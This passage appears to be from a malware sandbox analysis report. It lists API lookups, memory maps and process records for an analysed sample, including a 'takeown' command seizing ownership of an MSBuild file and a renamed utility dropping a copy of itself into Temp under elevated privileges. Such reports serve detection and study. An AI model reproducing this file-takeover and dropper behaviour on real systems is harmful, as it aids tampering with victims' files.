| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:13:07 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #217: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #217 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:33, Reason: Child Process |
| Unmonitor | End Time: 00:03:38, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xebc |
| Parent PID | 0xf1c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
ECC
0x
C54
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000860000 | 0x00860000 | 0x0087ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x0086ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000870000 | 0x00870000 | 0x00873fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x00881fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00880000 | 0x00884fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x008a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008b0000 | 0x008b0000 | 0x008effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008f0000 | 0x008f0000 | 0x0092ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000930000 | 0x00930000 | 0x00933fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000940000 | 0x00940000 | 0x00940fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000950000 | 0x00950000 | 0x00951fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00960000 | 0x00a1dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000a20000 | 0x00a20000 | 0x00a5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a60000 | 0x00a60000 | 0x00a9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000aa0000 | 0x00aa0000 | 0x00adffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00aa0000 | 0x00ac9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000aa0000 | 0x00aa0000 | 0x00aa0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ab0000 | 0x00ab0000 | 0x00ab0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ad0000 | 0x00ad0000 | 0x00adffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b00000 | 0x00b00000 | 0x00b0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b10000 | 0x00b10000 | 0x00ddffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b10000 | 0x00b10000 | 0x00c97fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ce0000 | 0x00ce0000 | 0x00ddffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000de0000 | 0x00de0000 | 0x00f60fff | Pagefile Backed Memory | r |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x0662ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06630000 | 0x06966fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e970000 | 0x7e970000 | 0x7ea6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ea70000 | 0x7ea70000 | 0x7ea92fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ea96000 | 0x7ea96000 | 0x7ea96fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea99000 | 0x7ea99000 | 0x7ea9bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea9c000 | 0x7ea9c000 | 0x7ea9efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ea9f000 | 0x7ea9f000 | 0x7ea9ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #218: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #218 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula "ImagingDevices.exe.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:34, Reason: Child Process |
| Unmonitor | End Time: 00:03:39, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd74 |
| Parent PID | 0x928 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
48C
0x
4F8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x0079ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x00927fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000930000 | 0x00930000 | 0x00ab0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ac0000 | 0x00ac0000 | 0x01ebffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ec0000 | 0x01ec0000 | 0x0207ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
